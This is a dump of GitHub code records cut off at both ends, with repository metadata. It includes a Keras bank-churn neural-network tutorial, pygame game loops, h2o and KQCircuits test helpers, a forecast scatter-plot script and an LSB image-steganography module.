traj[:, :-1]] / P[traj[:, :-1] - N, traj[:, 1:] - N]\n )\n ent = ent_aff + ent_wtd + ent_sys\n ent_rate = ent.sum(-1) / time_traj[:, -1]\n return ent, ent_rate\n","repo_name":"kdkyum/odd_neep","sub_path":"data/odd_markov_jump.py","file_name":"odd_markov_jump.py","file_ext":"py","file_size_in_byte":8061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17040411776","text":"from Bin.Physics import *\nfrom Bin.Init import *\ndef MainLoop():\n\n\n\n GameWasStopped_=0\n done=False\n GameIs='Running'\n TimeOfDeath=0\n amount=0\n StartTime=time.time()\n\n while not done:\n\n # print(GameIs, GameWasStopped_)\n\n #\n\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n done = True\n if TurnAI == 0 or AmountOfBalls != 1:\n BigRectangle.control(e)\n\n #\n if not(TurnAI == 0 or AmountOfBalls != 1):\n BigRectangle.autocontrol(Balls[0].pos[0] + Balls[0].width/2, BigRectangle.pos[0] + BigRectangle.width/2)\n\n # Проверка На НеКонецИгры\n from Classes.Ball import GameIs\n if(GameIs == 'Stopped' and GameWasStopped_==0):\n for i in range(len(Balls)):\n Balls[i].speed[0]=0\n Balls[i].speed[1] = 0\n\n final_Time=str(round((time.time() - StartTime - 1), 1))\n LastScores.AddScore(final_Time)\n HighScores.AddScore(final_Time)\n HighScores.sort()\n #LastScores.sort()\n FinishText.update_text(\"Game Has been finished with the score: \" + final_Time)\n GameWasStopped_=1\n FullRenderCycle()\n TimeOfDeath= (round((time.time() - StartTime - 1), 1))\n # Проверка На НеКонецИгры\n '''\n if GameWasStopped_== 1 :\n final_Time = str((round( TimeOfDeath-(time.time() - StartTime - 1) + 5, 1)))\n if float(final_Time) <= 0:\n\n #Balls = []\n Balls.pop()\n done=True\n StartTime=time.time()\n\n RestartText.update_text(\"Game Will Restart in \" + final_Time +\" seconds\")\n FullRenderCycle()\n '''\n\n if(amount > fps and GameIs == 'Running'):\n FullRenderCycle() # Отрисовка\n FullPhysCycle() # Проверка Физики\n\n\n #Fps Writter\n amount+=1\n if ((time.time() - StartTime) / amount) != 0:\n ActualFPS = ((1 / ((time.time() - StartTime) / amount)))\n else:\n ActualFPS=fps\n decre = (1000/(ActualFPS) ) - (1000/fps)\n pygame.time.wait(int(1000/fps - fps*decre))\n if((amount%(fps*2)) == 0): print( 'fps =', round(ActualFPS,2) )\n #Fps Writter\n\n\n","repo_name":"DortyTheGreat/Code-Samples","sub_path":"Pyhton/Pixels/Bin/MainCycle.py","file_name":"MainCycle.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35261266659","text":"def nfinder(x):\r\n while x%2 == 0:\r\n x = x/2\r\n return int((x+1)/2)\r\n\r\ndef zerofinder(x):\r\n if x % 2 == 1 or x < 3:\r\n return '​'\r\n dividing_point = nfinder(x)\r\n totalzeros = int(((x - 3)/2))\r\n firstsetofzeros = dividing_point - 1\r\n print(str(firstsetofzeros) + '' + ',', end='')\r\n print(str(totalzeros - firstsetofzeros + 1))\r\n\r\nfor i in range(3,25):\r\n if i % 2 == 0:\r\n print(str(i) + ' ', end='')\r\n zerofinder(i)","repo_name":"HakanIchoz/zeros-in-A119974","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5555206669","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 22 20:53:20 2019\r\n\r\n@author: Sefa3\r\n\"\"\"\r\n\r\n#-----------------------Part 1 : Data Preprocessing----------------------------\r\n\"\"\" \r\nThe problem that we are about to deal with is a 
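Note on the `MainCycle` record above: its loop regulates frame rate by measuring elapsed time and calling `pygame.time.wait` with a hand-computed correction. pygame ships a simpler primitive for exactly this — `pygame.time.Clock.tick` sleeps just enough to cap the loop at a target FPS. A minimal sketch (an alternative idiom, not a drop-in rewrite of the game's loop):

```python
import pygame

pygame.init()
screen = pygame.display.set_mode((320, 240))  # event queue needs an initialized display
clock = pygame.time.Clock()
fps = 60

running = True
while running:
    for e in pygame.event.get():
        if e.type == pygame.QUIT:
            running = False
    # ... update game state and draw here ...
    pygame.display.flip()
    clock.tick(fps)            # sleeps the remainder of the frame budget

print(round(clock.get_fps(), 2))  # smoothed measured frame rate
pygame.quit()
```

`clock.tick()` also returns the milliseconds spent on the last frame, which replaces the manual `time.time()` bookkeeping used for the FPS printout in the record.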
classification problem.\r\nWe have several independent variables, like credit score, the balance, \r\nthe number of products...\r\nAnd based on these independent variables,\r\nwe are trying to predict which customers are leaving the bank.\r\nANN can do a terrific job at doing this,\r\nand making that kind of predictions...\r\n\"\"\"\r\n#------------------------------------------------------------------------------\r\n\"\"\"\r\n* Theano Libray\r\nTheano is an open source numerical computations library,\r\nvery efficient for fast numerical computations.\r\nAnd that is based on numpy syntax.\r\n\"\"\"\r\n#------------------------------------------------------------------------------\r\n\"\"\"\r\n* Tensorflow Library\r\nTensorflow is another numerical computations library\r\nthat runs very fast computations.\r\nAnd that can run our CPU or GPU\r\nCPU : Central Processing Unit\r\nGPU : Graphical Processing Unit\r\n\"\"\"\r\n#------------------------------------------------------------------------------\r\n\"\"\"\r\n* Keras Library\r\nThe Keras library is an amazing library to build deep learning models,\r\nin a few lines of code.\r\nKeras is a library based on Theano and Tensorflow,\r\nand exactly as we use scikit-learn to build very efficiently \r\nmachine learning models.\r\n\"\"\"\r\n#------------------------------------------------------------------------------\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n#------------------------------------------------------------------------------\r\n# Importing the dataset\r\ndataset = pd.read_csv('Churn_Modelling.csv')\r\n#------------------------------------------------------------------------------\r\n# the key thing to understand here is that\r\n# all these variables here are independent variables.\r\n# but the last columns is our dependent variable.\r\n# 1 : exited, 0 : stayed.\r\ndataset.head()\r\nX = dataset.iloc[:, 3:13].values\r\ny = dataset.iloc[:, 13:14].values\r\nX\r\ny\r\n#------------------------------------------------------------------------------\r\n# Encoding categorical data\r\n# Encoding the Independent Variable\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\n\r\nlabelencoder_X1 = LabelEncoder()\r\nX[:, 1] = labelencoder_X1.fit_transform(X[:, 1])\r\nX\r\n\r\nlabelencoder_X2 = LabelEncoder()\r\nX[:, 2] = labelencoder_X2.fit_transform(X[:, 2])\r\nX\r\n#------------------------------------------------------------------------------\r\n\"\"\"\r\nto create dummy variables\r\nour categorical variables are not ordinal\r\nthat means that there is no relational order\r\nbetween our categorical variables.\r\nFrance is not higher than Germany, ...\r\nto avoid dummy variable trap;\r\n\"\"\"\r\nonehotencoder = OneHotEncoder(categorical_features = [1])\r\nX = onehotencoder.fit_transform(X).toarray()\r\n#------------------------------------------------------------------------------\r\n# first 3 variables : dummy variables\r\nX = X.astype('float64')\r\n# to avoid dummy variable trap,\r\n# we need to drop the first column.\r\nX = X[:, 1:]\r\n#------------------------------------------------------------------------------\r\n# Splitting the dataset into the Training set and Test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, \r\n random_state = 0)\r\n#------------------------------------------------------------------------------\r\n\"\"\"\r\nFeature Scaling\r\nwe need to apply 
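Note on the encoding step above: `OneHotEncoder(categorical_features=[1])` follows the pre-0.20 scikit-learn API; that keyword was later removed in favour of `ColumnTransformer`, and `drop='first'` now handles the dummy-variable trap directly instead of the manual `X = X[:, 1:]` slice. A sketch of the modern equivalent (column index 1 as in the script; the demo rows are invented):

```python
import numpy as np
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder

ct = ColumnTransformer(
    [('geo', OneHotEncoder(drop='first'), [1])],  # one-hot column 1, drop one level
    remainder='passthrough')                      # keep the other features unchanged

X_demo = np.array([[600, 'France', 42],
                   [700, 'Spain', 35],
                   [650, 'Germany', 51]], dtype=object)
X_enc = ct.fit_transform(X_demo)
print(X_enc.shape)   # (3, 4): two dummy columns + two passthrough columns
```

Dropping one dummy level removes the exact linear dependence among the indicator columns, which is all the "dummy variable trap" comment in the record is about.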
feature scaling\r\nto ease all these calculations.\r\nbecause, we don't want to have one independent variable\r\nthat dominating another one.\r\n\"\"\"\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc = StandardScaler()\r\nX_train = sc.fit_transform(X_train)\r\nX_test = sc.transform(X_test)\r\n#------------------------------------------------------------------------------\r\n#______________________________________________________________________________\r\n\r\n#--------------------Part 2 : Now let's make the ANN!--------------------------\r\n# Importing the Keras libraries and packages\r\n# import tensorflow as tf\r\n\r\n# to initialize our neural network.\r\n# from tensorflow.keras.models import Sequential\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n# this is the model will use to create layers in our ANN.\r\n# from tensorflow.keras.layers import Dense\r\n#------------------------------------------------------------------------------\r\n# Initializing the ANN\r\nclassifier = Sequential()\r\n#------------------------------------------------------------------------------\r\n\"\"\"\r\nAdding the input layer and the first hidden layer\r\nwe'll choose the 'rectifier activation function' for the hidden layers\r\nand we'll choose the 'sigmoid activation function' for the output layer.\r\n\"\"\"\r\n# output_dim = (11 + 1) / 2 = 6\r\nclassifier.add(Dense(6, activation = 'relu', input_shape = (11, )))\r\n#------------------------------------------------------------------------------\r\n# Adding the second hidden layer\r\nclassifier.add(Dense(6, activation = 'relu'))\r\n#------------------------------------------------------------------------------\r\n# Adding the output layer\r\nclassifier.add(Dense(1, activation = 'sigmoid'))\r\n#------------------------------------------------------------------------------\r\n# Compiling the ANN\r\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy',\r\n metrics = ['accuracy'])\r\n#------------------------------------------------------------------------------\r\n# Fitting the ANN to the Training set\r\nclassifier.fit(X_train, y_train, batch_size = 10, epochs = 100)\r\n#------------------------------------------------------------------------------\r\n#______________________________________________________________________________\r\n\r\n#----------Part 3 : Making the predictions and evaluating the model------------\r\n# Predicting the Test set results\r\ny_pred = classifier.predict(X_test)\r\ny_pred = (y_pred > 0.5)\r\n# Making the Confusion Matrix\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = confusion_matrix(y_test, y_pred)\r\naccuracy = (cm[0, 0] + cm[1, 1]) / np.sum(cm)\r\n#------------------------------------------------------------------------------\r\n#______________________________________________________________________________\r\n\r\n#---------------Part 4 : Predicting a single new observation-------------------\r\n\"\"\"\r\nPredict if the customer with the following information will leave the bank:\r\n Geography : France = [0, 0] <-- corresponds to\r\n Credit Score : 600\r\n Gender : Male = [1] <-- corresponds to\r\n Age : 40\r\n Tenure : 3\r\n Balance : 60000\r\n Number of Products : 2\r\n Has Credit Card : Yes = [1] <-- corresponds to\r\n Is Active Member : Yes = [1] <-- corresponds to\r\n Estimated Salary : 50000\r\n\"\"\"\r\n\r\nmy_array = np.array([[0, 0, 600, 1, 40, 3, 60000, 2, 1, 1, 50000]])\r\nnormal_array = sc.transform(my_array) # to normalize \r\nnew_prediction 
= classifier.predict(normal_array)\r\nnew_y_pred = (new_prediction > 0.5)\r\n#______________________________________________________________________________\r\n\r\n#-------------Part 5 : Evaluating, Improving and Tuning the ANN----------------\r\n# Evaluating the ANN\r\n'''\r\nto fix this variance problem;\r\nk-Fold Cross Validation fixes it by splitting the training set\r\ninto K folds (most of the time K = 10):\r\nwe train our model on 9 folds and test it on the\r\nlast remaining fold.\r\nThere we take 10 different combinations of 9 folds to train\r\na model and 1 fold to test it.\r\nThat means we can train the model and test the model\r\non 10 combinations of training and test sets.\r\nAnd that will give us a much better idea of the model\r\nperformance because we take an average of the different\r\naccuracies of the 10 evaluations and also compute\r\nthe standard deviation to have a look at the variance.\r\nSo eventually, our analysis will be much more relevant.\r\n'''\r\nfrom keras.wrappers.scikit_learn import KerasClassifier\r\nfrom sklearn.model_selection import cross_val_score\r\n\r\ndef build_classifier():\r\n    classifier = Sequential()\r\n    classifier.add(Dense(6, activation = 'relu', input_shape = (11, )))\r\n    classifier.add(Dense(6, activation = 'relu'))\r\n    classifier.add(Dense(1, activation = 'sigmoid'))\r\n    classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy',\r\n                       metrics = ['accuracy'])\r\n    return classifier\r\n\r\nclassifier_cv = KerasClassifier(build_fn = build_classifier,\r\n                                batch_size = 10, epochs = 100, verbose = 0)\r\n\r\naccuracies = cross_val_score(estimator = classifier_cv, X = X_train,\r\n                             y = y_train, cv = 10, n_jobs = 1)\r\n\r\nmean = accuracies.mean()\r\nvariance = accuracies.std()\r\n\"\"\"\r\nwe are in 'Low Bias Low Variance':\r\nthe best accuracy with low variance\r\naccuracy : % 85.9\r\nvariance : % 1.22\r\n\"\"\"\r\n#------------------------------------------------------------------------------\r\n# Improving the ANN\r\n\"\"\"\r\nDropout Regularization:\r\nit is the solution for overfitting in deep learning.\r\nOverfitting is when your model was trained too much\r\non the training set, so much that it performs much worse\r\non the test set, and we can observe this\r\nwhen we have a large difference of accuracies between\r\nthe training set and the test set.\r\nGenerally, when overfitting happens, you have a much\r\nhigher accuracy on the training set than the test set.\r\nAnother way to detect overfitting is when you\r\nobserve high variance when applying k-fold CV,\r\nbecause when the model is overfitted on the training\r\nset it has learned the correlations too specifically, and\r\nthis may cause the model to fail on 'other' test sets.\r\n\"\"\"\r\n# Dropout Regularization to reduce overfitting if needed.\r\nfrom keras.layers import Dropout\r\n\r\nclassifier = Sequential()\r\n\r\n# Adding the input layer and the first hidden layer\r\nclassifier.add(Dense(6, activation = 'relu', input_shape = (11, )))\r\nclassifier.add(Dropout(rate = 0.1))\r\n\r\n# Adding the second hidden layer\r\nclassifier.add(Dense(6, activation = 'relu'))\r\nclassifier.add(Dropout(rate = 0.1))\r\n\r\n# Adding the output layer (no dropout here: dropping the single output unit would zero the prediction)\r\nclassifier.add(Dense(1, activation = 'sigmoid'))\r\n\r\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy',\r\n                   metrics = ['accuracy'])\r\n\r\nclassifier.fit(X_train, y_train, batch_size = 10, epochs = 
100)\r\n#------------------------------------------------------------------------------\r\n# Tuning the ANN\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\ndef build_classifier(optimizer):\r\n classifier = Sequential()\r\n \r\n classifier.add(Dense(6, activation = 'relu', input_shape = (11, )))\r\n classifier.add(Dense(6, activation = 'relu'))\r\n classifier.add(Dense(1, activation = 'sigmoid'))\r\n \r\n classifier.compile(optimizer = optimizer, \r\n loss = 'binary_crossentropy',\r\n metrics = ['accuracy']\r\n )\r\n return classifier\r\n\r\nclassifier_cv = KerasClassifier(build_fn = build_classifier)\r\n\r\nparameters = {'batch_size' : [25, 32],\r\n 'epochs' : [100, 500],\r\n 'optimizer' : ['adam', 'rmsprop']\r\n }\r\n\r\ngrid_search = GridSearchCV(estimator = classifier_cv,\r\n param_grid = parameters,\r\n scoring = 'accuracy',\r\n cv = 10\r\n )\r\n\r\ngrid_seach_cv = grid_search.fit(X = X_train, y = y_train)\r\nbest_parameters = grid_seach_cv.best_params_\r\nbest_accuracy = grid_seach_cv.best_score_\r\n\r\n# best_parameters = {'batch_size': 32, 'epochs': 500, 'optimizer': 'rmsprop'}\r\n# best_accuracy = 0.860125\r\n#------------------------------------------------------------------------------\r\nclassifier = Sequential()\r\n\r\n# Adding the input layer and the first hidden layer\r\nclassifier.add(Dense(6, activation = 'relu', input_shape = (11, )))\r\n\r\n# Adding the second hidden layer\r\nclassifier.add(Dense(6, activation = 'relu'))\r\n\r\n# Adding the output layer\r\nclassifier.add(Dense(1, activation = 'sigmoid'))\r\n\r\nclassifier.compile(optimizer = 'rmsprop', loss = 'binary_crossentropy',\r\n metrics = ['accuracy'])\r\n\r\nclassifier.fit(X_train, y_train, batch_size = 32, epochs = 100)\r\n\r\ny_pred_tuned = classifier.predict(X_test)\r\ny_pred_tuned = (y_pred_tuned > 0.5)\r\n\r\ncm_tuned = confusion_matrix(y_test, y_pred_tuned)\r\naccuracy_tuned = (cm_tuned[0, 0] + cm_tuned[1, 1]) / np.sum(cm_tuned)\r\n\r\n# accuracy_tuned : % 86.4\r\n#______________________________________________________________________________","repo_name":"Sefa314159/Deep-Learning-A-Z-Hands-On-Artificial-Neural-Networks","sub_path":"1. 
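Note on Part 5 above: the record wraps the Keras model in `KerasClassifier` so that scikit-learn's `GridSearchCV` can drive it. The grid-search mechanics are independent of Keras; a self-contained sketch with a plain scikit-learn estimator and toy data (the grid values are illustrative):

```python
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import GridSearchCV

X, y = make_classification(n_samples=300, n_features=11, random_state=0)

grid = GridSearchCV(LogisticRegression(max_iter=1000),
                    param_grid={'C': [0.1, 1.0, 10.0]},
                    scoring='accuracy',
                    cv=10)                 # 10-fold CV per grid point, as in the record
grid.fit(X, y)
print(grid.best_params_, grid.best_score_)
```

With 3 grid points and 10 folds this fits 30 models plus one refit on the best parameters — the same cost structure that makes the record's `{batch_size} x {epochs} x {optimizer}` Keras grid expensive.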
Artificial Neural Networks/ann_sefa.py","file_name":"ann_sefa.py","file_ext":"py","file_size_in_byte":12951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13351157544","text":"import sys\nsys.path.insert(1,\"../../\")\nimport h2o\nfrom tests import pyunit_utils\n\n\ndef test_relevel_by_freq_topn():\n prostate_cat = h2o.import_file(path=pyunit_utils.locate(\"smalldata/prostate/prostate_cat.csv\"))\n\n dpros_levels_ordered = prostate_cat[\"DPROS\"].table().as_data_frame()[\"DPROS\"].tolist()\n assert dpros_levels_ordered == [\"Both\", \"Left\", \"None\", \"Right\"]\n\n prostate_cat_relevel = prostate_cat.relevel_by_frequency(top_n=1)\n\n dpros_relevel_levels = prostate_cat_relevel[\"DPROS\"].table().as_data_frame()[\"DPROS\"].tolist()\n assert dpros_relevel_levels == ['Left', 'Both', 'None', 'Right']\n\n top_drops_level = prostate_cat[\"DPROS\"].table().as_data_frame().sort_values(by=\"Count\")[\"DPROS\"].tolist()[-1]\n prostate_cat_relevel_manual = prostate_cat[\"DPROS\"].relevel(y=top_drops_level)\n assert prostate_cat_relevel_manual.levels() == [dpros_relevel_levels] \n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(test_relevel_by_freq_topn)\nelse:\n test_relevel_by_freq_topn()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_misc/pyunit_relevel_by_freq_topn.py","file_name":"pyunit_relevel_by_freq_topn.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"7606207992","text":"from kqcircuits.pya_resolver import pya\n\n\"\"\"\n Module containing base unit tests to be used by all chips.\n\n The functions in this module are not pytest unit tests by themselves, but must be called by test functions in the\n modules for individual chip tests.\n\n Typical usage example:\n\n from tests.chips.chip_base_tests import errors_test, box_existence_test\n from kqcircuits.chips.single_xmons import SingleXmons\n\n def test_errors(capfd):\n errors_test(capfd, SingleXmons)\n\n def test_box_existence():\n box_existence_test(SingleXmons)\n\n\"\"\"\n\n\ndef errors_test(capfd, cls):\n \"\"\"Test if exceptions happen during creation of an element.\n\n When an element is created using create(), it calls the element's produce_impl(). Exceptions\n happening in produce_impl() are caught by KLayout and output to stderr. Thus we can't detect the exceptions\n directly, but we can check stderr for errors. NOTE: This assumes that there are no unrelated errors output to stderr\n by klayout. 
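Note on `errors_test` above: it detects failures indirectly by asserting that nothing was written to stderr, because KLayout catches exceptions raised inside `produce_impl` instead of propagating them. The capture mechanism itself is plain pytest — the `capfd` fixture intercepts output at the file-descriptor level. A self-contained illustration of that fixture, independent of KLayout:

```python
import sys

def test_nothing_on_stderr(capfd):
    print("progress message")          # goes to stdout, which is fine
    out, err = capfd.readouterr()      # drain everything captured so far
    assert err == "", err              # fail loudly if anything hit stderr

def test_detects_stderr(capfd):
    sys.stderr.write("boom\n")         # simulate a swallowed-and-logged error
    out, err = capfd.readouterr()
    assert "boom" in err
```

`capfd` (unlike `capsys`) also catches output written by C/C++ extensions directly to fd 2, which is exactly the channel a native host application like KLayout uses.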
This may also not catch every possible error.\n \"\"\"\n layout = pya.Layout()\n cell = cls.create(layout)\n out, err = capfd.readouterr()\n assert err == \"\", err\n\n\ndef box_existence_test(cls):\n layout = pya.Layout()\n cell = cls.create(layout)\n parameters = cell.pcell_parameters_by_name()\n assert type(parameters[\"box\"]) is pya.DBox\n","repo_name":"iqm-finland/KQCircuits","sub_path":"tests/chips/chip_test_helpers.py","file_name":"chip_test_helpers.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"61"} +{"seq_id":"38040650041","text":"binary = int(input(\"Binært tall: \"))\n\n\nbinAsStr = str(binary)\nbinLen = len(binAsStr) - 1 #-1 pga vil ha med at siste teikn er potens 0 og ikke 1\n\nbuffer = 0\n\nfor i in binAsStr:\n if i == \"1\":\n buffer += 2**binLen\n\n binLen -= 1\n\nprint(buffer)","repo_name":"gronnmann/INF100","sub_path":"uke4/uke_04_oppg_11.py","file_name":"uke_04_oppg_11.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28535225755","text":"\"\"\"\nPlot true vs prediction to visualise where the errors occur\n\"\"\"\n# Standard Library Modules\nfrom pathlib import Path\nfrom datetime import datetime\nimport math\n\n# External Modules\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sklearn.metrics as metrics\n\n\ndef scatter_inner(ax, df, actual, model, ax_title):\n ax.scatter(df[actual], df[model], 1)\n minval = df[[actual, model]].min().min()\n maxval = df[[actual, model]].max().max()\n ax.plot([minval, maxval], [minval, maxval], ls=\"--\", color=\"black\")\n ax.set_xlabel('Actual GHI (W/m2)')\n ax.set_ylabel('Forecast GHI (W/m2)')\n rmse = math.sqrt(metrics.mean_squared_error(df[actual], df[model]))\n ax.set_title(f\"{ax_title} RMSE = {rmse:.2f}\")\n return ax\n\n\ndef scatter_error(df, actual, model, ax_title=\"\", fig_title=\"\", filebase=\"plot\", output_path=Path(\"\")):\n fig, ax = plt.subplots()\n fig.set_size_inches(8, 8)\n ax = scatter_inner(ax, df, actual, model, ax_title)\n fig.suptitle(fig_title)\n fig.savefig(output_path)\n plt.close(fig)\n\ndef scatter_error_quad(df_list, actual, model, ax_title_list=[\"\"], fig_title=\"\", filebase=\"plot\", output_path=Path(\"\")):\n fig, ((ax0, ax1), (ax2, ax3)) = plt.subplots(nrows=2, ncols=2)\n fig.set_size_inches(11, 11)\n ax0 = scatter_inner(ax0, df_list[0], actual, model, ax_title_list[0])\n ax1 = scatter_inner(ax1, df_list[1], actual, model, ax_title_list[1])\n ax2 = scatter_inner(ax2, df_list[2], actual, model, ax_title_list[2])\n ax3 = scatter_inner(ax3, df_list[3], actual, model, ax_title_list[3])\n fig.suptitle(fig_title)\n fig.savefig(output_path)\n plt.close(fig)\n\ndef read_parquet(path):\n df = pd.read_parquet(path)\n df[\"datetime\"] = pd.to_datetime(df[\"predicted-time\"], format=\"%Y-%m-%d_%H-%M-%S\")\n df = df.set_index(\"datetime\")\n df = df.sort_index()\n return df\n\ndef plot1():\n df = read_parquet(\"/results/CaseStudies/scatter/All/blackmountain_fully-conv_2x60s_120s_run_03_crop_1024_lr_3.0E-6_fold_4_metrics.parquet\")\n df = df.dropna()\n scatter_error(\n df,\n actual=\"actual\",\n model=\"fully-conv_2x60s_120s_run_03_fold_4\",\n ax_title=\"\",\n fig_title=f\"Actual vs Forecast GHI. 
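Note on the INF100 exercise above (comments in Norwegian): it converts a binary string to decimal with an explicit power-of-two loop, decrementing the exponent as it walks left to right. The same loop written over the reversed string, with Python's built-in base-2 parser as a reference check:

```python
def bin_to_dec(bits: str) -> int:
    total = 0
    for i, ch in enumerate(reversed(bits)):   # i is the exponent of this digit
        if ch == "1":
            total += 2 ** i
    return total

for s in ("1", "101", "11010"):
    assert bin_to_dec(s) == int(s, 2)         # int(s, 2) parses base-2 directly
print(bin_to_dec("11010"))                    # -> 26
```

The `binLen = len(binAsStr) - 1` line in the record is the same idea from the other end: the last character carries exponent 0, hence the `- 1`.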
Category: All\",\n output_path=\"/results/CaseStudies/scatter/scatter-all.pdf\")\n\ndef plot_quad1():\n df_list = [\n read_parquet(\"/results/CaseStudies/scatter/All/blackmountain_fully-conv_2x60s_120s_run_03_crop_1024_lr_3.0E-6_fold_4_metrics.parquet\").dropna(),\n read_parquet(\"/results/CaseStudies/scatter/Intermittent/blackmountain_fully-conv_2x60s_120s_run_03_crop_1024_lr_3.0E-6_fold_4_metrics.parquet\").dropna(),\n read_parquet(\"/results/CaseStudies/scatter/Overcast/blackmountain_fully-conv_2x60s_120s_run_03_crop_1024_lr_3.0E-6_fold_4_metrics.parquet\").dropna(),\n read_parquet(\"/results/CaseStudies/scatter/Sunny/blackmountain_fully-conv_2x60s_120s_run_03_crop_1024_lr_3.0E-6_fold_4_metrics.parquet\").dropna(),\n ]\n scatter_error_quad(\n df_list,\n actual=\"actual\",\n model=\"fully-conv_2x60s_120s_run_03_fold_4\",\n ax_title_list=[\"All\", \"Intermittent\", \"Overcast\", \"Sunny\"],\n fig_title=f\"Solpred model, 2 inputs 60 seconds apart, 2 minute forecast horizon\\nActual vs Forecast GHI by category\",\n output_path=\"/results/CaseStudies/scatter/scatter-quad.png\")\n\n\n\ndef main():\n plot1()\n plot_quad1()\n\n\nif __name__ == '__main__':\n main()","repo_name":"wongjoel/Solpred","sub_path":"src/plotting/scatter-plot.py","file_name":"scatter-plot.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"439133393","text":"from PIL import Image, ImageDraw\nimport random\nfrom stego.container import Container\n\ndef flip(i, j):\n\t#реализует lsb matching\n\tif j == 1:\n\t\tif i == 0:\n\t\t\treturn 1\n\t\telif i == 255:\n\t\t\treturn -1\n\t\telse: \n\t\t\treturn (1-2*(random.getrandbits(1)))\n\telse: \n\t\treturn 0\n\ndef get_lsb(pix):\n\t#возвращзает младшие биты пикселя\n\treturn [i&1 for i in pix]\n\ndef set_new_lsb(pix, lsb):\n\t#возвращает новые цветовые компоненты пикселя такие, чтобы младшие биты были равны lsb\n\ttemp = [i^j for i, j in zip(get_lsb(pix), lsb)]\n\ttemp+=[0]*(3 - len(temp))\n\treturn [(i+flip(i, j)) for i, j in zip(pix, temp)]\n\n\ndef image_to_bin_list(img, n):\n\t#возвращает вектор из младших битов пикселей изображения длины n, если это возможно\n\tobj = img.load()\n\tcontainer = []\n\tsize = min(n, img.size[0]*img.size[1]*3)\n\tlength = min(n//3+n%3-(n%3)//2, img.size[0]*img.size[1])\n\tfor i in range(length):\n\t\tcontainer.extend(get_lsb(obj[i%img.size[0], i//img.size[0]]))\n\treturn container\n\ndef emb_in_image(img, container, filename_new_image):\n\t#изменяет младшие биты в изображении так, чтобы вложить сообщение\n\tlength = min(len(container)//3+len(container)%3-(len(container)%3)//2, img.size[0]*img.size[1])\n\tobj = img.load()\n\tfor i in range(length):\n\t\tobj[i%img.size[0], i//img.size[0]]= tuple(set_new_lsb(obj[i%img.size[0], i//img.size[0]], container[i*3:(i+1)*3+len(container)%3]))\n\tprint(filename_new_image)\n\timg.save(filename_new_image)\n\t\n","repo_name":"olegkhachumov/Stego","sub_path":"stego/image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7363599517","text":"import random\nimport special_cells\nimport pygame\nimport sys\n\n\nLENGHT = 1000\nHEIGHT = 575\n\npygame.init()\nscreen = pygame.display.set_mode((LENGHT, HEIGHT))\nscreen.fill((100, 150, 200))\n\nproperty_list = {'start': [-1], 'мотель' : [4000, None, 0, 4], 'турбаза' : [4000, None, 0, 4], 'шанс1' : [-1], 'гостинница' : 
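Note on the stego record above (comments in Russian): `flip` implements LSB matching — when a cover byte's least-significant bit disagrees with the message bit, the byte is randomly nudged by ±1 (clamped at 0 and 255) rather than having its bit overwritten, which avoids the statistical signature of plain LSB replacement. The rule for a single byte, extracted as a sketch:

```python
import random

def embed_bit_matching(byte: int, bit: int) -> int:
    """Return a byte whose LSB equals `bit`, changed by +/-1 only if needed."""
    if (byte & 1) == bit:
        return byte                       # already carries the right bit
    if byte == 0:
        return 1                          # cannot go below 0
    if byte == 255:
        return 254                        # cannot go above 255
    return byte + random.choice((-1, 1))  # random direction hides the change

random.seed(0)
for b in (0, 17, 254, 255):
    assert embed_bit_matching(b, 1) & 1 == 1
    assert embed_bit_matching(b, 0) & 1 == 0
```

Because +1 and −1 are chosen with equal probability, an embedded image does not show the "pairs of values" histogram artifact that makes classic LSB replacement easy to detect.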
